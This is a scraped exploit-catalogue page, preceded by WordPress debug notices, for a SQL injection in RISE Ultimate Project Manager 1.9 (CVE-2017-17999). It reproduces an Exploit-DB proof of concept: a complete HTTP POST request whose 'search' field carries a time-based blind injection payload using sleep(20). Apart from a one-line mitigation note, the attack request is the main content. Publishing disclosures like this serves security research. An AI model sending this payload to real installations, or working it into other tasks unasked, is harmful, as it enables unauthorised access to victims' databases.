Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-import-export-lite domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6121

Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the insert-headers-and-footers domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6121

Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6121
RISE Ultimate Project Manager 1.9 - SQL Injection - exploit.company
header-logo
Suggest Exploit
vendor:
RISE Ultimate Project Manager
by:
Ahmad Mahfouz
9.8
CVSS
CRITICAL
SQL Injection
89
CWE
Product Name: RISE Ultimate Project Manager
Affected Version From: 1.9
Affected Version To: 1.9
Patch Exists: NO
Related CWE: CVE-2017-17999
CPE: a:fairsketch:rise_ultimate_project_manager:1.9
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: None
2017

RISE Ultimate Project Manager 1.9 – SQL Injection

RISE Ultimate Project Manager version 1.9 is vulnerable to SQL Injection. An attacker can exploit this vulnerability by sending a malicious payload to the application via the 'search' parameter in the POST request. This payload will cause the application to sleep for 20 seconds, indicating a successful exploitation of the vulnerability.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.
Source

Exploit-DB raw data:

# Exploit Title: RISE Ultimate Project Manager 1.9 - SQL Injection
# Exploit Author: Ahmad Mahfouz 
# Contact: http://twitter.com/eln1x
# Date: 30/12/2017
# CVE: CVE-2017-17999
# Vendor Homepage: http://fairsketch.com/
# Version: 1.9

 

 

POST /index.php/knowledge_base/get_article_suggestion/ HTTP/1.1
Host: localhost
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 14
Connection: close

 
search=product'%20and%20(select*from(select(sleep(20)))a)--%20

Navigation

Suggest Exploit

Services By CQR

cqrsecured